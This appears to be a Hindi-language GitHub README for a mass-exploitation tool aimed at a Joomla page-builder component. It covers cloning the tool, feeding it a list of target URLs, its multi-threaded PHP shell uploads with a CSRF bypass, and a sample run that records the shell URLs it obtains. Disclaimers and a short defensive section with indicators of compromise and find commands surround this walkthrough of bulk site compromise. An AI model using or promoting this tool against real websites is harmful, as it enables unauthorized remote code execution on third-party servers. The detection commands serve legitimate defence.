
CVE-2026-56290 - Joomla Com_pagebuilderck घटक के लिए मास एक्सप्लॉइट (अप्रतिबंधित फ़ाइल अपलोड → RCE)। मल्टी-थ्रेडेड, स्वचालित CSRF बाईपास, PHP शेल अपलोडर।
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।
- कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है
- इस उपकरण का उपयोग केवल उन प्रणालियों पर करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है
- लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है
- इस उपकरण का उपयोग करके, आप सभी लागू कानूनों और विनियमों का पालन करने के लिए सहमत हैं
अधिक अस्वीकरण: आप Jenderal92 के कवर पर अस्वीकरण देख सकते हैं। आप इसे यहाँ !!! जांच सकते हैं
CVE-2026-56290 एक बड़े पैमाने पर शोषण उपकरण है जो Com_pagebuilderck Joomla घटक को लक्षित करता है। यह कमजोरी दूरस्थ हमलावरों को एक असीमित फ़ाइल अपलोड तंत्र के माध्यम से मनमानी PHP फ़ाइलें अपलोड करने की अनुमति देती है, जिससे दूरस्थ कोड निष्पादन (RCE) होता है।
| गुण | मान |
|---|
| CVE ID | CVE-2026-56290 |
| घटक | Com_pagebuilderck |
| प्लेटफॉर्म | Joomla! CMS |
| प्रकार | असीमित फ़ाइल अपलोड (RCE) |
| CVSS स्कोर | 9.8 (गंभीर) |
/media/com_pagebuilderck/gfonts/ पर अपलोड करता हैreslt.txt में सहेजता हैPython 2.7
pip (Python package installer)
Python निर्भरताएँ
pip install requests colorama
🔧 स्थापना
git clone https://github.com/Jenderal92/CVE-2026-56290.git
cd CVE-2026-56290
pip install -r requirements.txt
📖 उपयोग
मूल उपयोग
python CVE-2026-56290.py targets.txt
इनपुट फ़ाइल प्रारूप
एक targets.txt फ़ाइल बनाएं जिसमें प्रति पंक्ति एक URL हो:
https://example1.com
http://example2.com/joomla
https://example3.com:8080
# Comments are ignored
आउटपुट
· कंसोल आउटपुट: वास्तविक समय प्रगति और परिणाम · reslt.txt: सभी संवेदनशील शेल URL शामिल हैं
उदाहरण रन
$ python CVE-2026-56290.py targets.txt
[+] CVE-2026-56290 - Com_pagebuilderck Mass Exploit
[+] Threads: 15
[+] Timeout: 10s
[+] Output file: reslt.txt
[+] Loaded 100 targets from file
[*] Starting pool with 15 processes...
[1] Queueing: https://example1.com
[2] Queueing: https://example2.com
...
[1] ✓✓✓ VULNERABLE: https://example1.com/media/com_pagebuilderck/gfonts/shell_abc123.php
⚙️ कॉन्फ़िगरेशन
आप स्क्रिप्ट में इन चरों को संशोधित कर सकते हैं:
THREADS = 15 # Number of concurrent workers
TIMEOUT = 10 # Request timeout in seconds
USER_AGENT = "..." # Custom User-Agent string
OUTPUT_FILE = "reslt.txt" # Output filename
🛡️ सुरक्षा संबंधी विचार
सिस्टम प्रशासकों के लिए
यदि आप Com_pagebuilderck के साथ एक Joomla साइट चला रहे हैं:
समझौता के संकेतक (IoC)
शोषण के इन संकेतों को देखें:
# Suspicious files in
/media/com_pagebuilderck/gfonts/*.php
/media/com_pagebuilderck/gfonts/*.phtml
/media/com_pagebuilderck/gfonts/*.phar
# Suspicious requests
/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&[token]=1
पहचान आदेश
# Find suspicious PHP files in the media directory
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -name "*.php" -type f
# Check for recent modifications
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -type f -mtime -7
# Look for suspicious file names (random strings)
ls -la /path/to/joomla/media/com_pagebuilderck/gfonts/ | grep -E '[a-z0-9]{8,}\.(php|phtml|phar)'
⚠️ कानूनी नोटिस
यह सॉफ्टवेयर "जैसा है" प्रदान किया गया है, बिना किसी प्रकार की वारंटी के। लेखक इस उपकरण के किसी भी अवैध या अनैतिक उपयोग के लिए जिम्मेदार नहीं है। किसी भी प्रणाली का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।
🙏 आभार
· सुरक्षा शोधकर्ता जिन्होंने CVE-2026-56290 की खोज और रिपोर्ट की · CMS को बनाए रखने के लिए Joomla समुदाय
याद रखें: बड़ी शक्ति के साथ बड़ी जिम्मेदारी आती है। इस उपकरण का नैतिक और कानूनी रूप से उपयोग करें।